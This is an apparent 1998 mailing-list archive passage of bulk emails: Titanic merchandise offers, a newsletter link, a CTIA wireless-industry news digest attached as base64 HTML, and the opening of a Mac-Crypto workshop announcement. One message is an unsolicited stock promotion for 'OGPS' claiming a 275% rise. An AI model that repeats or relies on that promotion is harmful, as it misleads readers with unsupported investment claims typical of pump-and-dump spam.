Message-ID: <199809160744.AAA18755@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Titanic Enthusiast:
 
    Sometime over the last few months you had visited our Titanic 
site entitled "Enter The Titanic". Also, you signed our Guest 
Book, expressed an interest in purchasing Titanic merchandise and 
left us your email address. I hope you don't mind receiving this 
message. If you do not wish to receive these messages regarding 
Titanic or Titanic merchandise in the future, simply respond to 
this email with "NO MORE" written in the subject window. 

    For those of you interested, the cost of two of our most 
popular items have been reduced by our suppliers due to large 
volumes sold from our site.  Authentic reproduction buttons and 
the Titanic CD ROM. 

 1). Authentic Reproductions - The Waterbury Button Company 
produced the solid brass buttons which adorned the coats of both 
the officers and crew of the R.M.S. Titanic. They also reproduced 
the buttons to be used in the James Camron movie "TITANIC". They 
have once more produced these buttons for public collection. These 
buttons are pressed from the same molds used in 1912, solid brass 
and coated in 24K gold. At only $29.95 plus shipping and handling 
they make a great gift or collection piece. CLICK HERE for a 
detailed description or visit 
http://www.geocities.com/baja/8334/reproductions.htm 
  

 2). "TITANIC: A Voyage of Discovery" CD ROM - This CD ROM disk is 
loaded with the most information compiled on Titanic than any 
other source available. It's filled with photos, music, video, 
artifacts and stories taken from the actual account of survivors. 
It's a must have for any Titanic enthusiast. This fact filled CD 
ROM has been reduced for a short time to only $45.95 plus shipping 
and handling. CLICK HERE for more details or visit 
http://www.unidial.com/~bflowers/home.htm 

    I hope you will visit these sites and add these great items to 
your Titanic collection. We pride ourselves in offering only the 
highest quality, authentic Titanic merchandise. Other products we 
offer are listed at our Titanic Merchandise page located at 
http://www.unidial.com/~bflowers/merchandise.htm 

Remember Titanic and those who lost their lives aboard her. May 
They Rest In Peace !
  

Bob Flowers, Jr. 
Webmaster 
Enter The Titanic 

 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Wed, 16 Sep 1998 02:16:11 -0700 (PDT)
To: (STUFFED WEDNESDAY SEPTEMBER 16 1998)
Subject:       ---->   http://stuffed.net/98/9/16/   <----
Message-ID: <19980916071000.15351.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/16/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: culasd@usa.net
Date: Wed, 16 Sep 1998 01:32:54 -0700 (PDT)
To: culasd@usa.net
Subject: Stock is up 275%!!
Message-ID: <199809160832.KAA23272@mail.myway.de>
MIME-Version: 1.0
Content-Type: text/plain



The stock is up 275% in less than 40 days. 


 

 

This Thursday, September 3, 1998

Omicron closed at $6.87


During this same time period the DOW has gone down over 1,700 points!


Don't Miss This One!


For more information: http://www.americanstockchannel.com/omicron


The stock symbol is: OGPS


_______________________


 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 16 Sep 1998 13:02:01 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 16, 1998
Message-ID: <199809161951.OAA26204@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713805.multipart/mixed"

--Boundary..3996.1071713805.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

The Newest Most Comprehensive Tradeshow of Wireless 
Computing and Communications is Only a Month Away. 
Register TODAY!
http://www.wirelessit.com/register.htm 

Team WOW-COM
wowcom@ctia.org
===========================================
 





--Boundary..3996.1071713805.multipart/mixed
Content-Type: application/octet-stream; name="bin00019.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00019.bin"
Content-Description: "_CTIA_Daily_News_19980916.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9wcm9mZXNzaW9uYWwvY29udmVudGlvbi93c2VjdXJpdHkvaW5k
ZXguY2ZtIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFn
ZXMvcHJvZmVzc2lvbmFsL2NvbnZlbnRpb24vd3NlY3VyaXR5OTguZ2lmIiBB
TFQ9IlRvZGF5J3MgTmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgU0VDVVJJ
VFkgOTgiIE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NzUgV0lEVEg9MTc1Pjwv
QT48L0NFTlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxD
RU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5IE5l
d3MgZnJvbSBXT1ctQ09NIC0gU2VwdGVtYmVyIDE2LCAxOTk4PC9GT05UPjwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iNTgwIj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5XSVJFTEVTUyBJLlQu
IEZlYXR1cmVzClRvcCBQcmVzZW50ZXJzIGluIENvbXB1dGluZy9XaXJlbGVz
cyBDb252ZXJnZW5jZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj5DVElBLCB0aGUgQ2VsbHVsYXIgVGVsZWNvbW11bmlj
YXRpb25zCkluZHVzdHJ5IEFzc29jaWF0aW9uLCB0b2RheSZuYnNwOyBhbm5v
dW5jZWQgbWFqb3IgY29uZmVyZW5jZSBzcGVha2VycyBhdAppdHMgV0lSRUxF
U1MgSS5ULiBjb252ZW50aW9uIGFuZCBleHBvLiBXSVJFTEVTUyZuYnNwOyBJ
LlQuIChJbmZvcm1hdGlvbgpUZWNobm9sb2dpZXMpIHJ1bnMgT2N0LiAxMi0x
NCBhdCBCYWxseZJzIExhcyBWZWdhcywgYW5kIHJlZ2lzdHJhdGlvbiBjYW4K
YmUmbmJzcDsgbWFkZSBvdmVyIHRoZSBXSVJFTEVTUyBJLlQuIHNlY3VyZSBz
aXRlOiBodHRwOi8vd3d3LndpcmVsZXNzaXQuY29tCig8QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25ld3Mv
ZnJhbWVpbmRleC5jZm0/YXJ0aWNsZWlkPTM0MjAiPldPVy1DT008L0E+KTwv
Rk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0rMT5DaXNjbyBTeXN0ZW1zIEFjcXVpcmVzCkNsYXJpdHkgV2lyZWxl
c3MgZm9yICQxNTcgTWlsbGlvbjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj5DaXNjbyBTeXN0ZW1zIGdvZXMgd2lyZWxl
c3Mgd2l0aCBpdHMgbGF0ZXN0CmFjcXVpc3Rpb24gdGhhdCBzaG91bGQgYmUg
Y29tcGxldGVkIGJ5IE5vdmVtYmVyLiAoPEEgSFJFRj0iaHR0cDovL3d3dy53
aXJlZC5jb20vbmV3cy9uZXdzL2J1c2luZXNzL3N0b3J5LzE1MDI0Lmh0bWwi
PldJUkVEPC9BPikKKDxBIEhSRUY9Imh0dHA6Ly93d3cuc2ptZXJjdXJ5LmNv
bS9idXNpbmVzcy90ZWNoL2RvY3MvMDIwMjYzLmh0bSI+U01KPC9BPikKKDxB
IEhSRUY9Imh0dHA6Ly9pbnRlcmFjdGl2ZS53c2ouY29tL2FydGljbGVzL1NC
OTA1ODcyMTY3MTQwMjY1NTAwLmh0bSI+V1NKPC9BPikKKDxBIEhSRUY9Imh0
dHA6Ly93d3cubmFuZG8ubmV0L25ld3Nyb29tL250bi9pbmZvLzA5MTU5OC9p
bmZvMV8xMzIxMi5odG1sIj5OQU5ETzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlRlbGVDb3Jw
IFBDUywgSW5jLiBKb2lucwpDVElBPC9GT05UPjwvRk9OVD48L0I+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlRlbGVDb3JwIFBDUyBJbmMuLCBvbmUg
b2YgQVQmYW1wO1QgV2lyZWxlc3MnCmxlYWQgYWZmaWxpYXRlcywgaGFzIGpv
aW5lZCB0aGUgQ2VsbHVsYXIgVGVsZWNvbW11bmljYXRpb25zIEluZHVzdHJ5
IEFzc29jaWF0aW9uLgooPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNv
bS9yZXN1bHRzL3Byb2Zlc3Npb25hbC9uZXdzL2ZyYW1laW5kZXguY2ZtP2Fy
dGljbGVpZD0zNDIxIj5XT1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+VGVsZWNvbSBJ
bmR1c3RyeSBXZWlnaHMKUmVmb3JtIG9mIFN0YW5kYXJkcyBTZXR0aW5nIFBy
b2Nlc3M8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+RG9lcyB0aGUgc3RhbmRhcmRzLXNldHRpbmcgcHJvY2VzcyBrZWVw
CnVwIHdpdGggdGhlIHBhY2Ugb2YgaW5ub3ZhdGlvbj8mbmJzcDsgU29tZSBU
ZWxlY29tIGhlYWRlcnMgdGhpbmsgbm90LiAoPEEgSFJFRj0iaHR0cDovL3d3
dy50ZWxlZG90Y29tLmNvbS9uZXdzMDk5OC9uZXdzMDkxNTk4XzMuaHRtbCI+
VEVMRS5DT008L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT5Nb3Rvcm9sYSBVbnZlaWxzIJNTeXN0
ZW0tb24tYS1DaGlwlApQcm9jZXNzb3IgZm9yIFRlbGVjb208L0ZPTlQ+PC9G
T05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+UHJvY2Vzc29y
IHNlZW4gYXMgYWR2YW50YWdlIGZvciBzd2l0Y2hpbmcKZXF1aXBtZW50LiAo
PEEgSFJFRj0iaHR0cDovL3d3dy5uZXdzYnl0ZXMuY29tL3B1Yk5ld3MvMTE4
MDg3Lmh0bWwiPk5FV1NCWVRFUzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlRlbGVjb20gTWVy
Z2VycyBNdXN0Ckd1YXJhbnRlZSBDb21wZXRpdGlvbjwvRk9OVD48L0ZPTlQ+
PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5TZW5hdGUgSnVkaWNp
YXJ5IENvbW1pdHRlZSdzIGFudGl0cnVzdApzdWJjb21taXR0ZWUgZXhhbWlu
ZWQgY29uc29saWRhdGlvbiBpbiB0aGUgdGVsZWNvbSBpbmR1c3RyeS4mbmJz
cDsgTGF3bWFrZXJzCmFyZSBmZWFyZnVsIHRoYXQgbWVnYW1lcmdlcnMgd2ls
bCBub3QgZ3VhcmFudGVlIGluY3JlYXNlZCBjb21wZXRpdGlvbi4KKDxBIEhS
RUY9Imh0dHA6Ly93d3cud2lyZWQuY29tL25ld3MvbmV3cy9wb2xpdGljcy9z
dG9yeS8xNTAyNS5odG1sIj5XSVJFRDwvQT4pCig8QSBIUkVGPSJodHRwOi8v
d3d3LnRlY2h3ZWIuY29tL2ludmVzdG9yL3N0b3J5L0lOVjE5OTgwOTE1UzAw
MTMiPlRFQ0hXRUI8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5MdWNlbnQgU2Vla3MgVG8gRXhw
YW5kCk92ZXJzZWFzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPkx1Y2VudCBUZWNobm9sb2dpZXMgaXMgbG9va2luZyBm
b3IgYSBwYXJ0bmVyCm92ZXJzZWFzIHRvIHN0cmVuZ3RoZW4gaXRzIHBvc2l0
aW9uIGluIHRoZSBkYXRhIG5ldHdvcmtpbmcsIHdpcmVsZXNzIGNvbW11bmlj
YXRpb25zCmluZHVzdHJ5LiZuYnNwOyBQb3NzaWJsZSBwYXJ0bmVycyBpbmNs
dWRlIE5va2lhIE95aiwgQWxjYXRlbCBBbHN0aG9tLCBFcmljc3NvbgphbmQg
Vm9jYWxUZWMuICg8QSBIUkVGPSJodHRwOi8vd3d3LnVzYXRvZGF5LmNvbS9s
aWZlL2N5YmVyL3RlY2gvY3RkNDcyLmh0bSI+VVNBVE9EQVk8L0E+KTwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0la
RT0rMT5CTEFTVCBUZWNobm9sb2d5IEJlbmVmaWNpYWwKVG8gV2lyZWxlc3Mg
QnJvYWRjYXN0IFNpZ25hbHM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+IkJlbGwgTGFicyBsYXllcmVkIHNwYWNlIHRp
bWUiIG9yIEJMQVNUCmNhbiBib29zdCB0aGUgd2lyZWxlc3MgY2FwYWNpdHkg
b2YgbXVsdGlwbGUgbWVzc2FnZXMgb3ZlciB0aGUgc2FtZSBjaGFubmVsCmJ5
IDEwIHRvIDIwIHRpbWVzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5henN0YXJu
ZXQuY29tL3B1YmxpYy9zdGFydGVjaC90bi5odG0iPkFaU1RBUjwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPlBvY2tldFNjaWVuY2UncyBNb2RlbQpUZWNobm9sb2d5IExvb2tz
IFRvIFNvbHZlIFBvcnRhYmxlIEUtbWFpbCBQcm9ibGVtczwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5Qb2NrZXRTY2ll
bmNlIHdpbGwgYW5ub3VuY2UgbmV3LCBpbmV4cGVuc2l2ZQpoYW5kLWhlbGQg
Y29tcHV0ZXJzIHRoYXQgd2lsbCB3b3JrIHdpdGggcHVibGljIGFuZCBjZWxs
dWxhciB0ZWxlcGhvbmVzLgooPEEgSFJFRj0iaHR0cDovL2ludGVyYWN0aXZl
Lndzai5jb20vYXJ0aWNsZXMvU0I5MDU4OTUxNjI3MTcxMTI1MDAuaHRtIj5X
U0o8L0E+KQooPEEgSFJFRj0iaHR0cDovL3d3dy5idXNpbmVzc3dpcmUuY29t
L2NnaS1iaW4vY2JfaGVhZGxpbmUuY2dpPyZzdG9yeV9maWxlPXRvZGF5LzEw
MzA1NTEmZGlyZWN0b3J5PS9sYXRpbWVzJmhlYWRlcl9maWxlPXRvcC5odG0m
Zm9vdGVyX2ZpbGU9Ym90dG9tLmh0bSI+QklaV0lSRTwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJS
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
PkNpZW5hIFN1c3BlY3RzIFJpdmFsCkZvcmNlZCBGYWlsZWQgTWVyZ2VyPC9G
T05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkNp
ZW5hIENvcnBvcmF0aW9uIGlzIGdhdGhlcmluZyBldmlkZW5jZQppbiAibGVn
YWxseSBxdWVzdGlvbmFibGUiIGFjdGl2aXRpZXMgYnkgYW4gdW5uYW1lZCBj
b21wZXRpdG9yIHRoZXkgc3VzcGVjdApzYWJvdGFnZWQgdGhlaXIgZmFpbGVk
IG1lcmdlciB3aXRoIFRlbGxhYnMsIEluYy4gKDxBIEhSRUY9Imh0dHA6Ly93
d3cud2FzaGluZ3RvbnBvc3QuY29tL3dwLXNydi9XUGxhdGUvMTk5OC0wOS8x
Ni8wMzhsLTA5MTY5OC1pZHguaHRtbCI+V0FTSFBPU1Q8L0E+KQooPEEgSFJF
Rj0iaHR0cDovL3d3dy5tc25iYy5jb20vbmV3cy8xOTY4NzcuYXNwIj5NU05C
QzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPkludGVybmFsIEhhY2sgQnJpbmdzCkRvd24gVSBT
IFdlc3QgU3lzdGVtPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPkFuIFUgUyBXZXN0IHZlbmRvciBoYWNrZWQgaW50byB0
aGUgY29tcGFueSdzCmNvbXB1dGVyIHN5c3RlbSB0byBzZWFyY2ggZm9yIGEg
bmV3IHByaW1lIG51bWJlciBhbmQgYnJvdWdodCB0aGVpciBzZXJ2aWNlcwp0
byBhIG5lYXIgc3RhbmRzdGlsbC4gKDxBIEhSRUY9Imh0dHA6Ly93d3cuemRu
ZXQuY29tL3pkdHYvY2RhL2luZGV4LzAsMjA3MywyMTM3OTc2LTIxMDM4NzQs
MDAuaHRtbCI+WkRORVQ8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5LaWxsIHRoZSCRMDCSIEFk
cywgQmVsbApBdGxhbnRpYyBXYXJucyBBVCZhbXA7VDwvRk9OVD48L0ZPTlQ+
PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5CQU0gY2xhaW1zIG5l
d3NwYXBlciBhZHMgbWlzbGVhZCBjdXN0b21lcnMsCmRpc3BhcmFnZSBCZWxs
IEF0bGFudGljIGRpcmVjdG9yeSBhc3Npc3RhbmNlIHNlcnZpY2UuICg8QSBI
UkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lv
bmFsL25ld3MvZnJhbWVpbmRleC5jZm0/YXJ0aWNsZWlkPTM0MjIiPldPVy1D
T008L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPkZvciBhZGRpdGlvbmFsIG5l
d3MgYWJvdXQKdGhlIHdpcmVsZXNzIGluZHVzdHJ5LS1pbmNsdWRpbmcgcGVy
aW9kaWMgbmV3cyB1cGRhdGVzIHRocm91Z2hvdXQgdGhlIGRheS0tdmlzaXQK
PEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbSI+aHR0cDovL3d3dy53
b3ctY29tLmNvbS48L0E+PC9GT05UPjwvRk9OVD48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUi
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPkNU
SUEgRGFpbHkgTmV3cyBmcm9tIFdPVy1DT00KaXMgdHJhbnNtaXR0ZWQgd2Vl
a2RheXMsIGV4Y2VwdCBmb3IgaG9saWRheXMuIFZpc2l0IHVzIG9uIHRoZSBX
b3JsZCBXaWRlCldlYiBhdCA8QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20u
Y29tL3Byb2Zlc3Npb25hbCI+aHR0cDovL3d3dy53b3ctY29tLmNvbS9wcm9m
ZXNzaW9uYWw8L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8UD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+SWYg
eW91IGFyZSBub3QgaW50ZXJlc3RlZAppbiByZWNlaXZpbmcgdGhlIENUSUEg
RGFpbHkgTmV3cyBmcm9tIFdPVy1DT00sIHBsZWFzZSBzZW5kIGEgbWVzc2Fn
ZSB0bwo8QSBIUkVGPSJtYWlsdG86dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1
bTIudW5pdHltYWlsLmNvbSI+dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIu
dW5pdHltYWlsLmNvbTwvQT4uJm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsK
CjxQPjxCPioqKjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0tMT4gVGhlIHRlcm0gInVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0y
LnVuaXR5bWFpbC5jb20iCm11c3QgYmUgbGlzdGVkIGluIHRoZSBUTyBzZWN0
aW9uIG9mIHRoZSBlbWFpbC48L0ZPTlQ+PC9GT05UPiAqKio8L0I+Jm5ic3A7
Cgo8UD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
LTE+UGxlYXNlIE5vdGU6IFNvbWUgb2YgdGhlCmxpbmtzIGluIHRvZGF5J3Mg
bmV3cyBhcmUgdGltZSBzZW5zaXRpdmUuJm5ic3A7IFRob3NlIGxpbmtzIG1h
eSBub3QgYmUKYXZhaWxhYmxlIGFzIG5ld3MgY2hhbmdlcyB0aHJvdWdob3V0
IHRoZSBkYXkuJm5ic3A7IEFsc28sIHNvbWUgbmV3cyBzb3VyY2VzCm1heSBi
ZSBzdWJzY3JpcHRpb24tYmFzZWQgb3IgcmVxdWlyZSByZWdpc3RyYXRpb24u
PC9GT05UPjwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxDRU5URVI+Jm5ic3A7PC9D
RU5URVI+Cgo8L0JPRFk+CjwvSFRNTD4K
--Boundary..3996.1071713805.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie@vmeng.com
Date: Wed, 16 Sep 1998 16:00:10 -0700 (PDT)
To: undisclosed-recipients:;
Subject: Announcement: Mac-Crypto Conference Oct 6-9, 1998
Message-ID: <199809162247.PAA49860@scv1.apple.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



 
 
         The Membership of the Mac-Crypto List invites you to

                      The Third Annual 
                          Macintosh
                Cryptography and Internet Commerce
                 Software Development Workshop
 
                         
                      October 6 - 9th, 1998
                      Town Hall Auditorium
                        Apple R&D Campus
